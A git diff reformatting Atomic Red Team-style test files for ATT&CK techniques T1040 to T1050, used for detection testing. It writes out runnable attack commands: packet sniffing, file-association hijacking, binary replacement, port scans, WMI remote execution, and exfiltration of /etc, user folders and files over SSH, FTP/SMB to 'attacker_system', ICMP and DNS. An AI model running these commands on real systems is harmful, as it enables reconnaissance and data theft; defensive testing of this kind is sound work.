diff --git a/Atomic_Threat_Coverage/Triggers/T1040.md b/Atomic_Threat_Coverage/Triggers/T1040.md index f82f36b7..cc5892bf 100644 --- a/Atomic_Threat_Coverage/Triggers/T1040.md +++ b/Atomic_Threat_Coverage/Triggers/T1040.md @@ -1,10 +1,17 @@ # T1040 - Network Sniffing + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1040) +
Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. -Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and Relay](https://attack.mitre.org/techniques/T1171), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary. +Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted +protocol. Techniques for name service resolution poisoning, such +as [LLMNR/NBT-NS Poisoning and Relay](https://attack.mitre.org/techniques/T1171), can also be used to capture +credentials to websites, proxies, and internal systems by redirecting traffic to an adversary. -Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (ex: IP addressing, hostnames, VLAN IDs) necessary for follow-on Lateral Movement and/or Defense Evasion activities.
+Network sniffing may also reveal configuration details, such as running services, version numbers, and other network +characteristics (ex: IP addressing, hostnames, VLAN IDs) necessary for follow-on Lateral Movement and/or Defense Evasion +activities. ## Atomic Tests @@ -16,74 +23,58 @@ Network sniffing may also reveal configuration details, such as running services - [Atomic Test #4 - Packet Capture PowerShell](#atomic-test-4---packet-capture-powershell) -
## Atomic Test #1 - Packet Capture Linux + Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed. -Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33. +Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33. **Supported Platforms:** Linux - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | interface | Specify interface to perform PCAP on. | String | ens33| - -#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) ```bash tcpdump -c 5 -nnni #{interface} tshark -c 5 -i #{interface} ``` - - - - -

## Atomic Test #2 - Packet Capture macOS + Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed. Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface en0A. **Supported Platforms:** macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | interface | Specify interface to perform PCAP on. | String | en0A| - -#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) ```bash tcpdump -c 5 -nnni #{interface} tshark -c 5 -i #{interface} ``` - - - - -

## Atomic Test #3 - Packet Capture Windows Command Prompt + Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark installed, along with WinPCAP. Windump will require the windump executable. @@ -91,32 +82,24 @@ Upon successful execution, tshark will execute and capture 5 packets on interfac **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | interface | Specify interface to perform PCAP on. | String | Ethernet0| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 c:\windump.exe ``` - - - - -

## Atomic Test #4 - Packet Capture PowerShell + Perform a packet capture using PowerShell with windump or tshark. This will require a host that has Wireshark/Tshark installed, along with WinPCAP. Windump will require the windump executable. @@ -124,26 +107,17 @@ Upon successful execution, tshark will spawn from powershell and capture 5 packe **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | interface | Specify interface to perform PCAP on. | String | Ethernet0| - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell & "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 & c:\windump.exe ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1042.md b/Atomic_Threat_Coverage/Triggers/T1042.md index 2856a413..761398e5 100644 --- a/Atomic_Threat_Coverage/Triggers/T1042.md +++ b/Atomic_Threat_Coverage/Triggers/T1042.md @@ -1,52 +1,52 @@ # T1042 - Change Default File Association + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1042) +
When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. -System file associations are listed under HKEY_CLASSES_ROOT\.[extension], for example HKEY_CLASSES_ROOT\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\[handler]\shell\[action]\command. For example: +System file associations are listed under HKEY_CLASSES_ROOT\.[extension], for example +HKEY_CLASSES_ROOT\.txt. The entries point to a handler for that extension located at +HKEY_CLASSES_ROOT\[handler]. The various commands are then listed as subkeys underneath the shell key at +HKEY_CLASSES_ROOT\[handler]\shell\[action]\command. For example: + * HKEY_CLASSES_ROOT\txtfile\shell\open\command * HKEY_CLASSES_ROOT\txtfile\shell\print\command * HKEY_CLASSES_ROOT\txtfile\shell\printto\command -The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)
+The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can +modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012) ## Atomic Tests - [Atomic Test #1 - Change Default File Association](#atomic-test-1---change-default-file-association) -
## Atomic Test #1 - Change Default File Association + Change Default File Association From cmd.exe of hta to notepad. -Upon successful execution, cmd.exe will change the file association of .hta to notepad.exe. +Upon successful execution, cmd.exe will change the file association of .hta to notepad.exe. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | extension_to_change | File Extension To Hijack | String | .hta| | target_extension_handler | txtfile maps to notepad.exe | Path | txtfile| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd assoc #{extension_to_change}=#{target_extension_handler} ``` #### Cleanup Commands: + ```cmd assoc .hta=htafile ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1044.md b/Atomic_Threat_Coverage/Triggers/T1044.md index bfdf996d..29866fdd 100644 --- a/Atomic_Threat_Coverage/Triggers/T1044.md +++ b/Atomic_Threat_Coverage/Triggers/T1044.md @@ -1,46 +1,64 @@ # T1044 - File System Permissions Weakness + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1044) +
Processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. -Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. +Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a +higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., +system bootup) then this technique can also be used for persistence. ### Services -Manipulation of Windows service binaries is one variation of this technique. Adversaries may replace a legitimate service executable with their own executable to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). Once the service is started, either directly by the user (if appropriate access is available) or through some other means, such as a system restart if the service starts on bootup, the replaced executable will run instead of the original service executable. +Manipulation of Windows service binaries is one variation of this technique. Adversaries may replace a legitimate +service executable with their own executable to gain persistence and/or privilege escalation to the account context the +service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). Once the service is +started, either directly by the user (if appropriate access is available) or through some other means, such as a system +restart if the service starts on bootup, the replaced executable will run instead of the original service executable. ### Executable Installers -Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088). Several examples of this weakness in existing common installers have been reported to software vendors. (Citation: Mozilla Firefox Installer DLL Hijack) (Citation: Seclists Kanthak 7zip Installer)
+Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, +self-extracting installers. During the installation process, it is common for installers to use a subdirectory within +the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create +subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for +execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. +This behavior is related to and may take advantage +of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). Some installers may also require elevated +privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related +to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088). Several examples of this weakness in +existing common installers have been reported to software vendors. (Citation: Mozilla Firefox Installer DLL Hijack) ( +Citation: Seclists Kanthak 7zip Installer) ## Atomic Tests - [Atomic Test #1 - File System Permissions Weakness](#atomic-test-1---file-system-permissions-weakness) -
## Atomic Test #1 - File System Permissions Weakness -This test to show checking file system permissions weakness and which can lead to privilege escalation by replacing malicious file. Example; check weak file permission and then replace. + +This test to show checking file system permissions weakness and which can lead to privilege escalation by replacing +malicious file. Example; check weak file permission and then replace. powershell -c "Get-WmiObject win32_service | select PathName" (check service file location) and -copy /Y C:\temp\payload.exe C:\ProgramData\folder\Update\weakpermissionfile.exe ( replace weak permission file with malicious file ) +copy /Y C:\temp\payload.exe C:\ProgramData\folder\Update\weakpermissionfile.exe ( replace weak permission file with +malicious file ) -Upon execution, open the weak permission file at %temp%\T1044_weak_permission_file.txt and verify that it's contents read "T1044 Malicious file". To verify -the weak file permissions, open File Explorer to%temp%\T1044_weak_permission_file.exe then open Properties and Security to view the Full Control permission is enabled. +Upon execution, open the weak permission file at %temp%\T1044_weak_permission_file.txt and verify that it's contents +read "T1044 Malicious file". To verify +the weak file permissions, open File Explorer to%temp%\T1044_weak_permission_file.exe then open Properties and Security +to view the Full Control permission is enabled. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | weak_permission_file | check weak files permission | path | $env:TEMP\T1044_weak_permission_file.txt| | malicious_file | File to replace weak permission file with | path | $env:TEMP\T1044\T1044_malicious_file.txt| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Get-WmiObject win32_service | select PathName @@ -48,37 +66,43 @@ Copy-Item #{malicious_file} -Destination #{weak_permission_file} -Force ``` #### Cleanup Commands: + ```powershell Remove-Item #{weak_permission_file} -Force -ErrorAction Ignore Remove-Item -Recurse (Split-Path #{malicious_file}) -Force -ErrorAction Ignore ``` - - #### Dependencies: Run with `powershell`! + ##### Description: A file must exist on disk at specified location (#{weak_permission_file}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{weak_permission_file}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item #{weak_permission_file} -Force | Out-Null Set-Content -Path #{weak_permission_file} -Value "T1044 Weak permission file" ``` + ##### Description: A file to replace the original weak_permission_file. In an attack this would be the malicious file gaining extra privileges + ##### Check Prereq Commands: + ```powershell if (Test-Path #{malicious_file}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory -Path $env:TEMP\T1044\ -Force | Out-Null New-Item #{malicious_file} -Force | Out-Null Set-Content -Path #{malicious_file} -Value "T1044 Malicious file" ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1046.md b/Atomic_Threat_Coverage/Triggers/T1046.md index 943bbe3f..9146177d 100644 --- a/Atomic_Threat_Coverage/Triggers/T1046.md +++ b/Atomic_Threat_Coverage/Triggers/T1046.md @@ -1,8 +1,12 @@ # T1046 - Network Service Scanning + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1046) +
Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. -Within cloud environments, adversaries may attempt to discover services running on other cloud hosts or cloud services enabled within the environment. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems.
+Within cloud environments, adversaries may attempt to discover services running on other cloud hosts or cloud services +enabled within the environment. Additionally, if the cloud environment is connected to a on-premises environment, +adversaries may be able to identify services running on non-cloud systems. ## Atomic Tests @@ -10,22 +14,18 @@ Within cloud environments, adversaries may attempt to discover services running - [Atomic Test #2 - Port Scan Nmap](#atomic-test-2---port-scan-nmap) -
## Atomic Test #1 - Port Scan + Scan ports to check for listening ports. -Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout. +Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what +ports are open in the range of 1-65535. Results will be via stdout. **Supported Platforms:** Linux, macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh for port in {1..65535}; @@ -34,34 +34,27 @@ do done ``` - - - - -

## Atomic Test #2 - Port Scan Nmap + Scan ports to check for listening ports with Nmap. -Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout. +Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to +determine if listening. Results will be via stdout. **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | network_range | Network Range to Scan. | string | 192.168.1.0/24| | port | Ports to scan. | string | 80| | host | Host to scan. | string | 192.168.1.1| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh nmap -sS #{network_range} -p #{port} @@ -69,9 +62,4 @@ telnet #{host} #{port} nc -nv #{host} #{port} ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1047.md b/Atomic_Threat_Coverage/Triggers/T1047.md index b8bc021e..1fa0044c 100644 --- a/Atomic_Threat_Coverage/Triggers/T1047.md +++ b/Atomic_Threat_Coverage/Triggers/T1047.md @@ -1,8 +1,12 @@ # T1047 - Windows Management Instrumentation + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1047) +
Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI) -An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI 2015)
+An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic +functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. ( +Citation: FireEye WMI 2015) ## Atomic Tests @@ -18,183 +22,138 @@ An adversary can use WMI to interact with local and remote systems and use it as - [Atomic Test #6 - WMI Execute Remote Process](#atomic-test-6---wmi-execute-remote-process) -
## Atomic Test #1 - WMI Reconnaissance Users -An adversary might use WMI to list all local User Accounts. + +An adversary might use WMI to list all local User Accounts. When the test completes , there should be local user accounts information displayed on the command line. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd wmic useraccount get /ALL /format:csv ``` - - - - -

## Atomic Test #2 - WMI Reconnaissance Processes + An adversary might use WMI to list Processes running on the compromised host. When the test completes , there should be running processes listed on the command line. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd wmic process get caption,executablepath,commandline /format:csv ``` - - - - -

## Atomic Test #3 - WMI Reconnaissance Software + An adversary might use WMI to list installed Software hotfix and patches. When the test completes, there should be a list of installed patches and when they were installed. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd wmic qfe get description,installedOn /format:csv ``` - - - - -

## Atomic Test #4 - WMI Reconnaissance List Remote Services -An adversary might use WMI to check if a certain Remote Service is running on a remote device. + +An adversary might use WMI to check if a certain Remote Service is running on a remote device. When the test completes, a service information will be displayed on the screen if it exists. A common feedback message is that "No instance(s) Available" if the service queried is not running. -A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" +A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreacheable **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | node | Ip Address | String | 127.0.0.1| | service_search_string | Name Of Service | String | Spooler| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd wmic /node:"#{node}" service where (caption like "%#{service_search_string}%") ``` - - - - -

## Atomic Test #5 - WMI Execute Local Process + This test uses wmic.exe to execute a process on the local host. -When the test completes , a new process will be started locally .A notepad application will be started when input is left on default. +When the test completes , a new process will be started locally .A notepad application will be started when input is +left on default. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | process_to_execute | Name or path of process to execute. | String | notepad.exe| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd wmic process call create #{process_to_execute} ``` #### Cleanup Commands: + ```cmd wmic process where name='#{process_to_execute}' delete >nul 2>&1 ``` - - - -

## Atomic Test #6 - WMI Execute Remote Process -This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter. + +This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node +parameter. To clean up, provide the same node input as the one provided to run the test -A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the default or provided IP is unreachable +A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the +default or provided IP is unreachable **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | node | Ip Address | String | 127.0.0.1| | process_to_execute | Name or path of process to execute. | String | notepad.exe| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd wmic /node:"#{node}" process call create #{process_to_execute} ``` #### Cleanup Commands: + ```cmd wmic /node:"#{node}" process where name='#{process_to_execute}' delete >nul 2>&1 ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1048.md b/Atomic_Threat_Coverage/Triggers/T1048.md index 016f91f6..f4683fd1 100644 --- a/Atomic_Threat_Coverage/Triggers/T1048.md +++ b/Atomic_Threat_Coverage/Triggers/T1048.md @@ -1,16 +1,20 @@ # T1048 - Exfiltration Over Alternative Protocol + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1048) +
Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different channels could include Internet Web services such as cloud storage. -Adversaries may leverage various operating system utilities to exfiltrate data over an alternative protocol. +Adversaries may leverage various operating system utilities to exfiltrate data over an alternative protocol. SMB command-line example: -* net use \\\attacker_system\IPC$ /user:username password && xcopy /S /H /C /Y C:\Users\\* \\\attacker_system\share_folder\ +* net use \\\attacker_system\IPC$ /user:username password && xcopy /S /H /C /Y C:\Users\\* + \\\attacker_system\share_folder\ Anonymous FTP command-line example:(Citation: Palo Alto OilRig Oct 2016) * echo PUT C:\Path\to\file.txt | ftp -A attacker_system +
## Atomic Tests @@ -25,168 +29,134 @@ Anonymous FTP command-line example:(Citation: Palo Alto OilRig Oct 2016) - [Atomic Test #5 - Exfiltration Over Alternative Protocol - DNS](#atomic-test-5---exfiltration-over-alternative-protocol---dns) -
## Atomic Test #1 - Exfiltration Over Alternative Protocol - SSH + Input a domain and test Exfiltration over SSH Remote to Local -Upon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz file. +Upon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz +file. **Supported Platforms:** macOS, Linux - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | target SSH domain | url | target.example.com| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz ``` - - - - -

## Atomic Test #2 - Exfiltration Over Alternative Protocol - SSH + Input a domain and test Exfiltration over SSH Local to Remote -Upon successful execution, tar will compress /Users/* directory and password protect the file modification of `Users.tar.gz.enc` as output. +Upon successful execution, tar will compress /Users/* directory and password protect the file modification +of `Users.tar.gz.enc` as output. **Supported Platforms:** macOS, Linux - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | target SSH domain | url | target.example.com| | user_name | username for domain | string | atomic| | password | password for user | string | atomic| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc' ``` - - - - -

## Atomic Test #3 - Exfiltration Over Alternative Protocol - HTTP + A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337. -Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded. +Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host +the directory with Python on port 1337, to be later downloaded. **Supported Platforms:** macOS, Linux +#### Run it with these steps! - - -#### Run it with these steps! 1. Victim System Configuration: - mkdir /tmp/victim-staging-area - echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt + mkdir /tmp/victim-staging-area + echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt 2. Using Python to establish a one-line HTTP server on victim system: - cd /tmp/victim-staging-area - python -m SimpleHTTPServer 1337 + cd /tmp/victim-staging-area + python -m SimpleHTTPServer 1337 3. To retrieve the data from an adversary system: - wget http://VICTIM_IP:1337/victim-file.txt - - - - - - + wget http://VICTIM_IP:1337/victim-file.txt

## Atomic Test #4 - Exfiltration Over Alternative Protocol - ICMP + Exfiltration of specified file over ICMP protocol. -Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout. +Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default +127.0.0.1). Results will be via stdout. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file | Path to file to be exfiltrated. | Path | C:\Windows\System32\notepad.exe| | ip_address | Destination IP address where the data should be sent. | String | 127.0.0.1| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) } ``` - - - - -

## Atomic Test #5 - Exfiltration Over Alternative Protocol - DNS + Exfiltration of specified file over DNS protocol. **Supported Platforms:** Linux +#### Run it with these steps! - - -#### Run it with these steps! 1. On the adversary machine run the below command. - tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"" >> received_data.txt + tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"" >> + received_data.txt 2. On the victim machine run the below commands. - xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done - -3. Once the data is received, use the below command to recover the data. - - cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r - - - - + xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done +3. Once the data is received, use the below command to recover the data. + cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r
diff --git a/Atomic_Threat_Coverage/Triggers/T1049.md b/Atomic_Threat_Coverage/Triggers/T1049.md index 774c30a5..e1b4ca12 100644 --- a/Atomic_Threat_Coverage/Triggers/T1049.md +++ b/Atomic_Threat_Coverage/Triggers/T1049.md @@ -1,16 +1,26 @@ # T1049 - System Network Connections Discovery + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1049) +
Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. -An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) +An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds +or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the +same types of discovery techniques depending on the operating system, but the resulting information may include details +about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in +which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network +Overview)(Citation: Google VPC Overview) ### Windows -Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). +Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net +use," and "net session" with [Net](https://attack.mitre.org/software/S0039). -### Mac and Linux +### Mac and Linux -In Mac and Linux, netstat and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to "net session".
+In Mac and Linux, netstat and lsof can be used to list current connections. who +-a and w can be used to show which users are currently logged in, similar to "net session" +. ## Atomic Tests @@ -20,22 +30,17 @@ In Mac and Linux, netstat and lsof can be used to list - [Atomic Test #3 - System Network Connections Discovery Linux & MacOS](#atomic-test-3---system-network-connections-discovery-linux--macos) -
## Atomic Test #1 - System Network Connections Discovery + Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. Results will output via stdout. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd netstat @@ -43,62 +48,39 @@ net use net sessions ``` - - - - -

## Atomic Test #2 - System Network Connections Discovery with PowerShell + Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Get-NetTCPConnection ``` - - - - -

## Atomic Test #3 - System Network Connections Discovery Linux & MacOS + Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout. **Supported Platforms:** Linux, macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh netstat who -a ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1050.md b/Atomic_Threat_Coverage/Triggers/T1050.md index 5dad7169..8afc63b1 100644 --- a/Atomic_Threat_Coverage/Triggers/T1050.md +++ b/Atomic_Threat_Coverage/Triggers/T1050.md @@ -1,8 +1,15 @@ # T1050 - New Service + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1050) +
When operating systems boot up, they can start programs or applications called services that perform background system functions. (Citation: TechNet Services) A service's configuration information, including the file path to the service's executable, is stored in the Windows Registry. -Adversaries may install a new service that can be configured to execute at startup by using utilities to interact with services or by directly modifying the Registry. The service name may be disguised by using a name from a related operating system or benign software with [Masquerading](https://attack.mitre.org/techniques/T1036). Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1035).
+Adversaries may install a new service that can be configured to execute at startup by using utilities to interact with +services or by directly modifying the Registry. The service name may be disguised by using a name from a related +operating system or benign software with [Masquerading](https://attack.mitre.org/techniques/T1036). Services may be +created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service +to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services +through [Service Execution](https://attack.mitre.org/techniques/T1035). ## Atomic Tests @@ -10,28 +17,25 @@ Adversaries may install a new service that can be configured to execute at start - [Atomic Test #2 - Service Installation PowerShell](#atomic-test-2---service-installation-powershell) -
